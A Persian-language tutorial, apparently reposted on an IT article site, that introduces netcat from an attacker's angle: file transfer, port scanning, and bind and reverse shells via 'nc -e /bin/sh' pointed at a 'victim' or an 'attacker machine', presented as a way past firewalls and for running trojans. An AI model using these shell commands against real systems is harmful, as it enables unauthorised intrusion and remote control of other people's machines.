Loading...

آشنایی با نت کد nc

نت کت یکی از محبوبترین و پرکابردترین برنامه ها توسط هکرها می باشدبرای همین از نت کت به عنوان چاقوی همه کاره هم یادمی شود.درصورت باز بودن یک پورت روی سیستم شما ، شخص مهاجم یا هکر به راحتی می تواند از طریق نت کت به آن نفوذ کند.
نت کت برنامه ای است که درعین سادگی و کم حجمی دربسیاری ازحملات نفوذی حتی در سطوح خیلی پیشرفته مورد استفاده هکران قرار می گیرد کاراصلی که این برنامه برای یک هکر انجام می دهد این است که data ها را برروی پورت های باز بین دو کامپیوتر انتقال می دهد.
نت کت اولین بار توسط Hobbit برای نسخه های مختلف یونیکس ازجمله Linux و ... نوشته شده ودرسال 1996 منتشرشده است و بالا خره دراواخر سال 1998، Weld pond نسخه ای برای ویندوز NT را اینجاد نمود.
یکی ازقابلیت های جالب این برنامه را میتوان به ارتباط ازپورتی به پورت دیگریاد کرد.
نکته : «این برنامه قابلیت ارتباط دوطرفه رو داراست - Listener و Clients - چه روی پورت TCP چه UDP»
خوب حالا قبل از شروع توضیحات درمورد دستورات باید با دو تا تعریف آشنا شوید.
سرویس گیرنده :
می تواندازطریق یک درگاه به کامپیوترموردنظر وصل شودو اطلاعاتی راازاین طریق ارسال کند.
سرویس دهنده :
هردرگاهی موردنظرشماباشدرابازکرده و منتظردریافت اطلاعات می شود.
NetCat برای انتقال اطلاعات :
یکی ازعامیانه ترین و ساده ترین امکاناتی که نت کت به شما می دهد انتقال فایلها می باشد.این برنامه قادر است یک فایل رابین دوکامپیوتربه راحتی منتقل کند.نت کت ازمفیدترین و سودمندترین ابزارها برای انتقال ، اطلاعات است . درصورتی که نت کت برروی یک کامپیوتربه صورت سرویس دهنده فعال باشد می توان ازطریق یک پورت ، اطلاعات را انتقال داد.
طرز انتقال اطلاعات :

nc -l -p 1234 >file


NC = اجرای برنامه
l- = حالت سرویس دهنده
p 1234- = شماره درگاه (پورت)
[File] = محل ذخیره داده هاارسالی

     [fileِفایل] >  nc [remot machine] 1234

NC - اجرای برنامه
[remot machin] = نام کامپیوتر هدف (آی پی)
1234 = شماره پورت مورد نظر
[file] = اطلاعات با این اسم استخراج می شه

نکته درمورد < : « درصورتی که این علامت اسم یک فایل باشد به عنوان دستگاه خروجی مشخص می شود واطلاعات دریافت شده درون آن قرار می گیرند،درصورتی که اینکارصورت نگیرد اطلاعات برروی صفحه نمایش نشان داده می شود. »

NetCat و پویش ها (یافتن پورت های باز اعم از UDP & TCP ) :
یکی از بهترین و پرکاربرد ترین توانایی این برنامه قدرتمند جستجو کردن و یافتن درگاه های بازبرروی کامپیوتر مورد نظر می باشد.این برنامه به صورت سریع و به راحتی با IP مورد نظر ارتباط برقرار می کند.
نکته : « این برنامه ازتکنیک پویش پورت ها به صورت Vanilla که یک استاندارد می باشد،پشتیبانی می کند. »
echo QUIT nc -v -w 3 targetmachine startport endport
QUIT = این چهار کاراکتر به هر پورت بازارسال می شود
NC = اجرای برنامه نت کت
v- = خروجی Verbose برای نشان دادن درگاه های باز برروی صفحه نمایش
w 3- = در3 ثانیه به هر جورت یک پیغام می فرستد و منتظرمی شه که این پیغام برگرده و معلوم بشه ان درگاه باز است یا بسته است
target machin = نام کامپیوتری(آی پی) که نت کت روی اون می خواهد اسکن بزنه
start port , end port = در اینجا شما تعیین می کنید که ازچه درگاهی تا چه درگاهی اسکن بزنه
NetCat و اینجاد ارتباط با یک درگاه باز و ارسال داده :
بعد از یافتن یک درگاه باز برروی کامپیوترهدف می توان ازاین برنامه جهت انتقال اطلاعات ( فایل ) استفاده کرد.
ارتباط و انتقال تحت درگاه های TCP :

                                                                                    nc remotemachine portnumber 

NC = اجرای برنامه روی کامپیوتر مبدا
rempotemachine = نام کامپیوتر (آی پی)
portnumber = درگاه باز
ارتباط و انتقال تحت درگاه های UDP :

                                                                                nc -u remotemachine portnumber

NC = اجرای برنامه
u- = انتخاب پروتکل ارتباطی UDP
remotemachine = نام کامپیوتر(آی پی) هدف
portnumber = درگاه باز

NetCat و اجرای دستورات ازطریق خط فرمان :
یکی ازقابلیت های بسیار عالی که به درد نفوذگر می خوره این هست که می تونه یک فایل یا ... از راه دور اجرا کنه . (برای مثال شما یک تروجان مثل ساب سون رو برای کامپیوتر هدف می فرستید و بعد هم اجراش می کنید)
«کیف کردید نه ؟؟؟؟ »

nc -l -p [port] -e/bin/sh 

nc = اجرای برنامه نت کت
l- = حالت سرویس دهنده
p port- = شماره درگاه مورد نظربرای ارتباط
e/bin/sh- = آدرس برنامه ای که بعد از برقراری ارتباط باید اجرا بشه.

nc victimmachine portnumber


nc = اجرای برنامه
victimmachine = آدرس آی پی ماشین قربانی
portnumber = شماره پورت مورد نظر برای برقراری ارتباط ازطریق پروتکل TCP
دراین حالت نت کت برروی کامپیوتر قربانی درحالت انتظار باقی می ماندتانفوذگرشروع به ارسال کند.

NetCat و ایجاد نفوذ برروی کامپیوترموردنظردرحالت فعال :

nc [attacker machine] [port] -e/bin/sh

nc = اجرای برنامه
attacker machine = آدرس آی پی کامپیوتر نفوذگر
port = شماره درگاه مورد نظر
e/bin/sh- = نام فایلی که بعد از اینجاد ارتباط ، اجرا خواهد شد.

nc -l -p port

nc = اجرای برنامه
l- = حالت سرویس دهنده
p port- = شماره پورت مورد نظر
با کمک این روش شما می توانید ازدیوار آتش به راحتی عبور کنید. به این دلیل که دیوار آتش سعی می کنه که ازورود اطلاعات از بیرون به داخل جلوگیری کنه ولی برعکس این موضوع رو به درستی پوشش نمی ده!
تذکر: تمام علامت های [ ] که درمتن بالا به کا برده شده در فرمول وجود ندارد و فقط برای تفکیک بهتر نوشته هاست.

منبع:http://alalam.blogfa.com/



نظرات

 

  • salam aya baraye netcat abzare digare narm afzari laze hast?
    ya na
    khode barname net cat mitoone be tanahhayi nofooz dashte bashe

    chon man bayad in maghalaro be tor jame eraee bedam
  • سلام .مطالبتان بسیار جالب بود .لطف کنید توضیحات بیشتری بدهید مثلا" ما از کجا بدانیم دستورهایمانرا به درستی اجرا کریم"دیگر اینکه"مراحل اجرای دستورات شل گرفتن و... را بنویسید "
لطفاً برای ارسال نظر ابتدا وارد حساب کاربری خود بشوید
اگر تاکنون ثبت نام نکرده اید ، روی این لینک کلیک کنید

از مجموع 96,939 مطلب نوشته شده توسط 832 نویسنده در 95 وب سایت و وبلاگ آی تی فارسی زبان، تاکنون 9,012 مقاله دست چین و در نشریه خوارزمی منتشر شده اند. در حال حاضر 6727 مقاله دریافت شده در انتظار نشر قرار دارند. تا امروز بیش از 133,114,000 بار این مقالات خوانده شده اند.

خرید جدیدترین مدل های کارت حافظه و مموری رم ها کلاس 10

https://janebi.com

تجربه ای متفاوت، تنوعی بینظیر

https://janebi.com

نشریه خوارزمی آگهی می پذیرد.

http://kharazmi.org

نام کاربری:
کلمه عبور: